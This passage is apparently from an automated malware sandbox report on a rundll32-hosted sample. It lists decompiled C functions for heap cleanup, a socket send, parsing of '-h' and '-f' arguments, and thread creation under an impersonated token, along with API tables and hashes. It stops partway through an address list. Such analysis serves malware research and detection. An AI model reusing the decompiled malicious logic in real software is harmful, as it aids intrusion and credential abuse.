                                                                                                                                                  0x04773275
                                                                                                                                                  0x04773276
                                                                                                                                                  0x04773287
                                                                                                                                                  0x04773291
                                                                                                                                                  0x04773293
                                                                                                                                                  0x04773293
                                                                                                                                                  0x047732a1
                                                                                                                                                  0x047732a1
                                                                                                                                                  0x047732ac

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04773BAA,?,?,?,00000000,00000000,?,?,?,04774A6E), ref: 04773220
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04773BAA,?,?,?,00000000,00000000,?,?,?,04774A6E,?,?,?,?), ref: 04773227
                                                                                                                                                  • htons.WS2_32(?), ref: 04773246
                                                                                                                                                  • memcpy.MSVCRT ref: 04773276
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 04773287
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0477329A
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047732A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4260819906-0
                                                                                                                                                  • Opcode ID: e67b50e530b38863b2d4e2e835b0b69835885f71318e3b604901aefd5c570a09
                                                                                                                                                  • Instruction ID: 89fd407d81c1caf0598d798e0bc06aaaeb0be7a4e1201bda8a18a325c5cbc664
                                                                                                                                                  • Opcode Fuzzy Hash: e67b50e530b38863b2d4e2e835b0b69835885f71318e3b604901aefd5c570a09
                                                                                                                                                  • Instruction Fuzzy Hash: B1114C76500249ABEF109FA89C89FEB7FA8EF49325F148085FE00AA281D779D905D764
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E04776BD1(void* __ecx, void* __esi) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                                  				void* _t52;
                                                                                                                                                  
                                                                                                                                                  				_t52 = __esi;
                                                                                                                                                  				if(__esi != 0) {
                                                                                                                                                  					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
                                                                                                                                                  						L11:
                                                                                                                                                  						return HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                                  					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
                                                                                                                                                  						L10:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
                                                                                                                                                  						goto L11;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					}
                                                                                                                                                  					do {
                                                                                                                                                  						L3:
                                                                                                                                                  						_t30 =  *(_t52 + 0x18) + _v8 * 4;
                                                                                                                                                  						if( *_t30 != 0) {
                                                                                                                                                  							_t32 =  *_t30;
                                                                                                                                                  							if( *_t32 != 0) {
                                                                                                                                                  								_t47 =  *((intOrPtr*)(_t52 + 0x30));
                                                                                                                                                  								if(_t47 != 0) {
                                                                                                                                                  									 *_t47( *_t32);
                                                                                                                                                  								}
                                                                                                                                                  								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
                                                                                                                                                  							}
                                                                                                                                                  							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                  					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
                                                                                                                                                  					goto L10;
                                                                                                                                                  				}
                                                                                                                                                  				return _t23;
                                                                                                                                                  			}









                                                                                                                                                  0x04776bd1
                                                                                                                                                  0x04776bd7
                                                                                                                                                  0x04776bef
                                                                                                                                                  0x04776c53
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776c5c
                                                                                                                                                  0x04776bf4
                                                                                                                                                  0x04776bfa
                                                                                                                                                  0x04776c49
                                                                                                                                                  0x04776c51
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776bfc
                                                                                                                                                  0x04776bfc
                                                                                                                                                  0x04776c02
                                                                                                                                                  0x04776c08
                                                                                                                                                  0x04776c0a
                                                                                                                                                  0x04776c0f
                                                                                                                                                  0x04776c11
                                                                                                                                                  0x04776c16
                                                                                                                                                  0x04776c1a
                                                                                                                                                  0x04776c1a
                                                                                                                                                  0x04776c2c
                                                                                                                                                  0x04776c2c
                                                                                                                                                  0x04776c3c
                                                                                                                                                  0x04776c3c
                                                                                                                                                  0x04776c3e
                                                                                                                                                  0x04776c44
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776bfc
                                                                                                                                                  0x04776c5e

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C29
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C2C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C39
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C3C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C4E
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C51
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C56
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C59
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 47fca31ff38152cf912f6898465ddf5fa77d1344e6fc53fc65fc017a07fd564f
                                                                                                                                                  • Instruction ID: 157056de5f46a997c640e306164f5485f04e3fa35efbfa6007c1a1b6c08686c1
                                                                                                                                                  • Opcode Fuzzy Hash: 47fca31ff38152cf912f6898465ddf5fa77d1344e6fc53fc65fc017a07fd564f
                                                                                                                                                  • Instruction Fuzzy Hash: 57114631600708EFDB24EF96C980F6ABBB9EF85351F510458E505972A5CB70FD48CA60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477652F(void* __ecx, signed int _a4) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				WCHAR** _v12;
                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				WCHAR** _t28;
                                                                                                                                                  				WCHAR* _t32;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				WCHAR* _t52;
                                                                                                                                                  				WCHAR* _t53;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					L20:
                                                                                                                                                  					if( *0x4787bc4 == 0) {
                                                                                                                                                  						 *0x4787bc4 = 0x2d;
                                                                                                                                                  					}
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = _a4;
                                                                                                                                                  					_t45 = _t20 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t42 =  *_t20;
                                                                                                                                                  						_t20 = _t20 + 2;
                                                                                                                                                  					} while (_t42 != 0);
                                                                                                                                                  					if(_t20 == _t45) {
                                                                                                                                                  						goto L20;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = 0;
                                                                                                                                                  					_t39 = CommandLineToArgvW(_a4,  &_v8);
                                                                                                                                                  					if(_t39 == 0) {
                                                                                                                                                  						L19:
                                                                                                                                                  						goto L20;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v8 <= 0) {
                                                                                                                                                  						L18:
                                                                                                                                                  						LocalFree(_t39);
                                                                                                                                                  						goto L19;
                                                                                                                                                  					}
                                                                                                                                                  					_t26 = StrToIntW( *_t39);
                                                                                                                                                  					_t44 = 1;
                                                                                                                                                  					_a4 = 1;
                                                                                                                                                  					if(_t26 > 0) {
                                                                                                                                                  						 *0x4787bc4 = _t26;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v8 > _t44) {
                                                                                                                                                  						do {
                                                                                                                                                  							_t28 = _t39 + _a4 * 4;
                                                                                                                                                  							_t52 =  *_t28;
                                                                                                                                                  							_v12 = _t28;
                                                                                                                                                  							if(_t52 != StrStrW(_t52, L"-h")) {
                                                                                                                                                  								_t53 =  *_v12;
                                                                                                                                                  								if(_t53 != StrStrW(_t53, L"-f")) {
                                                                                                                                                  									_t32 = StrChrW(_t53, 0x3a);
                                                                                                                                                  									if(_t32 != 0) {
                                                                                                                                                  										_t44 = 0;
                                                                                                                                                  										 *_t32 = 0;
                                                                                                                                                  										E047769AE(_t53,  &(_t32[1]), 1);
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									 *0x4787b7c =  *0x4787b7c & 0xfffffffd;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								E047764A6(_t52, _t44);
                                                                                                                                                  							}
                                                                                                                                                  							_a4 =  &(_a4[0]);
                                                                                                                                                  						} while (_a4 < _v8);
                                                                                                                                                  					}
                                                                                                                                                  					goto L18;
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x0477653a
                                                                                                                                                  0x0477660e
                                                                                                                                                  0x04776616
                                                                                                                                                  0x04776618
                                                                                                                                                  0x04776618
                                                                                                                                                  0x04776625
                                                                                                                                                  0x04776540
                                                                                                                                                  0x04776540
                                                                                                                                                  0x04776543
                                                                                                                                                  0x04776546
                                                                                                                                                  0x04776546
                                                                                                                                                  0x04776549
                                                                                                                                                  0x0477654c
                                                                                                                                                  0x04776555
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776563
                                                                                                                                                  0x0477656c
                                                                                                                                                  0x04776570
                                                                                                                                                  0x0477660d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477660d
                                                                                                                                                  0x04776579
                                                                                                                                                  0x04776606
                                                                                                                                                  0x04776607
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776607
                                                                                                                                                  0x04776581
                                                                                                                                                  0x04776589
                                                                                                                                                  0x0477658a
                                                                                                                                                  0x0477658f
                                                                                                                                                  0x04776591
                                                                                                                                                  0x04776591
                                                                                                                                                  0x04776599
                                                                                                                                                  0x047765a2
                                                                                                                                                  0x047765a5
                                                                                                                                                  0x047765a8
                                                                                                                                                  0x047765b0
                                                                                                                                                  0x047765b7
                                                                                                                                                  0x047765c5
                                                                                                                                                  0x047765d1
                                                                                                                                                  0x047765df
                                                                                                                                                  0x047765e7
                                                                                                                                                  0x047765e9
                                                                                                                                                  0x047765eb
                                                                                                                                                  0x047765f5
                                                                                                                                                  0x047765f5
                                                                                                                                                  0x047765d3
                                                                                                                                                  0x047765d3
                                                                                                                                                  0x047765d3
                                                                                                                                                  0x047765b9
                                                                                                                                                  0x047765bb
                                                                                                                                                  0x047765bb
                                                                                                                                                  0x047765fa
                                                                                                                                                  0x04776600
                                                                                                                                                  0x04776605
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776599

                                                                                                                                                  APIs
                                                                                                                                                  • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04777A8E,?), ref: 04776566
                                                                                                                                                  • StrToIntW.SHLWAPI(00000000,?,?,?,?,04777A8E,?), ref: 04776581
                                                                                                                                                  • StrStrW.SHLWAPI(00000000,04781580,?,?,?,?,?,04777A8E,?), ref: 047765B3
                                                                                                                                                  • StrStrW.SHLWAPI(00000000,04781588,?,?,?,?,?,04777A8E,?), ref: 047765CD
                                                                                                                                                  • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04777A8E,?), ref: 047765DF
                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,04777A8E,?), ref: 04776607
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArgvCommandFreeLineLocal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1203019955-0
                                                                                                                                                  • Opcode ID: 09b4835018ed7fca8928d061d7eda052c545ba3350fd32ba5595266e6391062a
                                                                                                                                                  • Instruction ID: 7235a38e9363b07cb10d29ceb24a71f2c569d5a745cbb2a573213b78a3d178cd
                                                                                                                                                  • Opcode Fuzzy Hash: 09b4835018ed7fca8928d061d7eda052c545ba3350fd32ba5595266e6391062a
                                                                                                                                                  • Instruction Fuzzy Hash: B331D271500618EFDF21AF24C9849EE7BA8FF54775B908069E802E7348E774FA41DB80
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E047798AB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void*** _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void _v32;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t22;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t39;
                                                                                                                                                  				void _t41;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  
                                                                                                                                                  				_t39 = 0;
                                                                                                                                                  				_t41 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t22 = E04776CED(0,  &_v12);
                                                                                                                                                  				_v16 = _t22;
                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                  					L12:
                                                                                                                                                  					return _t41;
                                                                                                                                                  				}
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t44 =  *( *_v12);
                                                                                                                                                  					_v32 = _t39;
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					_v28 = _a4;
                                                                                                                                                  					_t29 = CreateThread(_t39, _t39, E0477988B,  &_v32, 4, _t39);
                                                                                                                                                  					_v8 = _t29;
                                                                                                                                                  					if(_t29 != _t39) {
                                                                                                                                                  						if(SetThreadToken( &_v8, _t44) != 0) {
                                                                                                                                                  							if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                  								GetLastError();
                                                                                                                                                  							} else {
                                                                                                                                                  								WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						CloseHandle(_v8);
                                                                                                                                                  					}
                                                                                                                                                  					_t41 = _v32;
                                                                                                                                                  					if(_t41 != _t39 || E04776D35(_v16, _a8,  &_v12) == 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t39 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				E04776B46(_v16);
                                                                                                                                                  				goto L12;
                                                                                                                                                  			}















                                                                                                                                                  0x047798ba
                                                                                                                                                  0x047798be
                                                                                                                                                  0x047798c0
                                                                                                                                                  0x047798c3
                                                                                                                                                  0x047798c8
                                                                                                                                                  0x047798cd
                                                                                                                                                  0x04779969
                                                                                                                                                  0x0477996f
                                                                                                                                                  0x0477996f
                                                                                                                                                  0x047798d7
                                                                                                                                                  0x047798dc
                                                                                                                                                  0x047798e0
                                                                                                                                                  0x047798e6
                                                                                                                                                  0x047798e7
                                                                                                                                                  0x047798e8
                                                                                                                                                  0x047798ef
                                                                                                                                                  0x047798fd
                                                                                                                                                  0x04779903
                                                                                                                                                  0x04779908
                                                                                                                                                  0x04779917
                                                                                                                                                  0x04779925
                                                                                                                                                  0x04779934
                                                                                                                                                  0x04779927
                                                                                                                                                  0x0477992c
                                                                                                                                                  0x0477992c
                                                                                                                                                  0x04779925
                                                                                                                                                  0x0477993d
                                                                                                                                                  0x0477993d
                                                                                                                                                  0x04779943
                                                                                                                                                  0x04779948
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047798d5
                                                                                                                                                  0x047798d5
                                                                                                                                                  0x04779964
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04776CED: GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776CFC
                                                                                                                                                    • Part of subcall function 04776CED: HeapAlloc.KERNEL32(00000000,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776CFF
                                                                                                                                                    • Part of subcall function 04776CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D24
                                                                                                                                                    • Part of subcall function 04776CED: HeapFree.KERNEL32(00000000,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D27
                                                                                                                                                  • CreateThread.KERNEL32 ref: 047798FD
                                                                                                                                                  • SetThreadToken.ADVAPI32(?,?,?,0477A15C,?,?), ref: 0477990F
                                                                                                                                                  • ResumeThread.KERNEL32(?,?,0477A15C,?,?), ref: 0477991C
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0477A15C,?,?), ref: 0477992C
                                                                                                                                                  • GetLastError.KERNEL32(?,0477A15C,?,?), ref: 04779934
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0477A15C,?,?), ref: 0477993D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 298440786-0
                                                                                                                                                  • Opcode ID: c6c898f6e9a5ba5b433ed7a4b0babadfb250b1965d43fb49b487477b1dea8e5e
                                                                                                                                                  • Instruction ID: 3349e09752756db347822276140e86d2cf5e6b83fc2dbf3a5a8986466a3fdb42
                                                                                                                                                  • Opcode Fuzzy Hash: c6c898f6e9a5ba5b433ed7a4b0babadfb250b1965d43fb49b487477b1dea8e5e
                                                                                                                                                  • Instruction Fuzzy Hash: 98213DF6A01209FFEF109FA4D9848DEBBB8EF48324B908565E611E3250D734AE058F50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776735(WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                  				short _v2052;
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				intOrPtr* _t13;
                                                                                                                                                  				WCHAR* _t16;
                                                                                                                                                  				WCHAR* _t22;
                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                  				short _t30;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  				short* _t34;
                                                                                                                                                  				signed int _t36;
                                                                                                                                                  				signed int _t39;
                                                                                                                                                  
                                                                                                                                                  				_t10 = E04776477();
                                                                                                                                                  				if(_t10 < 0xf) {
                                                                                                                                                  					_t10 = 0xf;
                                                                                                                                                  				}
                                                                                                                                                  				wsprintfW( &_v2052, L"%d", _t10);
                                                                                                                                                  				_t13 =  &_v2052;
                                                                                                                                                  				_t33 = _t13 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t29 =  *_t13;
                                                                                                                                                  					_t13 = _t13 + 2;
                                                                                                                                                  				} while (_t29 != 0);
                                                                                                                                                  				_t39 = _t13 - _t33 >> 1;
                                                                                                                                                  				EnterCriticalSection(0x4787b9c);
                                                                                                                                                  				_t46 =  *0x4783010;
                                                                                                                                                  				if( *0x4783010 != 0) {
                                                                                                                                                  					E04776628(_t29, _t46);
                                                                                                                                                  				}
                                                                                                                                                  				_t16 = 0x4783b90;
                                                                                                                                                  				_t4 =  &(_t16[1]); // 0x4783b92
                                                                                                                                                  				_t34 = _t4;
                                                                                                                                                  				do {
                                                                                                                                                  					_t30 =  *_t16;
                                                                                                                                                  					_t16 =  &(_t16[1]);
                                                                                                                                                  				} while (_t30 != 0);
                                                                                                                                                  				_t36 = (_t16 - _t34 >> 1) + _t39;
                                                                                                                                                  				if(_t36 >= _a8 - 1) {
                                                                                                                                                  					SetLastError(0x7a);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t22 = _a4;
                                                                                                                                                  					 *_t22 = 0;
                                                                                                                                                  					StrCatW(_t22,  &_v2052);
                                                                                                                                                  					StrCatW(_a4, 0x4783b90);
                                                                                                                                                  					_t39 = _t36;
                                                                                                                                                  				}
                                                                                                                                                  				LeaveCriticalSection(0x4787b9c);
                                                                                                                                                  				return _t39;
                                                                                                                                                  			}














                                                                                                                                                  0x0477673e
                                                                                                                                                  0x04776746
                                                                                                                                                  0x0477674a
                                                                                                                                                  0x0477674a
                                                                                                                                                  0x04776758
                                                                                                                                                  0x0477675e
                                                                                                                                                  0x04776767
                                                                                                                                                  0x0477676a
                                                                                                                                                  0x0477676a
                                                                                                                                                  0x0477676d
                                                                                                                                                  0x04776770
                                                                                                                                                  0x04776781
                                                                                                                                                  0x04776783
                                                                                                                                                  0x04776789
                                                                                                                                                  0x04776790
                                                                                                                                                  0x04776792
                                                                                                                                                  0x04776792
                                                                                                                                                  0x0477679c
                                                                                                                                                  0x0477679e
                                                                                                                                                  0x0477679e
                                                                                                                                                  0x047767a1
                                                                                                                                                  0x047767a1
                                                                                                                                                  0x047767a4
                                                                                                                                                  0x047767a7
                                                                                                                                                  0x047767b0
                                                                                                                                                  0x047767b9
                                                                                                                                                  0x047767df
                                                                                                                                                  0x047767bb
                                                                                                                                                  0x047767bb
                                                                                                                                                  0x047767c6
                                                                                                                                                  0x047767d1
                                                                                                                                                  0x047767d7
                                                                                                                                                  0x047767d9
                                                                                                                                                  0x047767d9
                                                                                                                                                  0x047767ea
                                                                                                                                                  0x047767f6

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04776477: GetTickCount.KERNEL32 ref: 04776477
                                                                                                                                                  • wsprintfW.USER32 ref: 04776758
                                                                                                                                                  • EnterCriticalSection.KERNEL32(04787B9C,?,00000000,00000000), ref: 04776783
                                                                                                                                                  • StrCatW.SHLWAPI(?,?), ref: 047767D1
                                                                                                                                                  • StrCatW.SHLWAPI(?,04783B90), ref: 047767D7
                                                                                                                                                  • SetLastError.KERNEL32(0000007A), ref: 047767DF
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(04787B9C), ref: 047767EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 230659905-0
                                                                                                                                                  • Opcode ID: 77b38b96262c73d8e4dc3ea10465a1e45117c323d4a9d9f465f151740f79a2b0
                                                                                                                                                  • Instruction ID: b4bccad9d433fb72601db8199110f36e6a94c9cad8ed555633b24cd917264fe7
                                                                                                                                                  • Opcode Fuzzy Hash: 77b38b96262c73d8e4dc3ea10465a1e45117c323d4a9d9f465f151740f79a2b0
                                                                                                                                                  • Instruction Fuzzy Hash: A41193716001049BDB206BA8DC49BEA37AAFF447A5F858865E946DB344FAB4FD04CFD0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477A3B1(void* __ecx, void* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				long _t18;
                                                                                                                                                  
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t18 = 0;
                                                                                                                                                  				_t9 = CreateThread(0, 0, E0477A016, 0, 4, 0);
                                                                                                                                                  				_v8 = _t9;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					_t18 = 0x57;
                                                                                                                                                  				} else {
                                                                                                                                                  					if(SetThreadToken( &_v8, _a4) == 0) {
                                                                                                                                                  						_t18 = GetLastError();
                                                                                                                                                  						goto L5;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                  							L5:
                                                                                                                                                  							CloseHandle(_v8);
                                                                                                                                                  							_v8 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				SetLastError(_t18);
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}






                                                                                                                                                  0x0477a3c4
                                                                                                                                                  0x0477a3c7
                                                                                                                                                  0x0477a3c9
                                                                                                                                                  0x0477a3cf
                                                                                                                                                  0x0477a3d4
                                                                                                                                                  0x0477a40f
                                                                                                                                                  0x0477a3d6
                                                                                                                                                  0x0477a3e5
                                                                                                                                                  0x0477a3fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a3e7
                                                                                                                                                  0x0477a3f3
                                                                                                                                                  0x0477a3ff
                                                                                                                                                  0x0477a402
                                                                                                                                                  0x0477a408
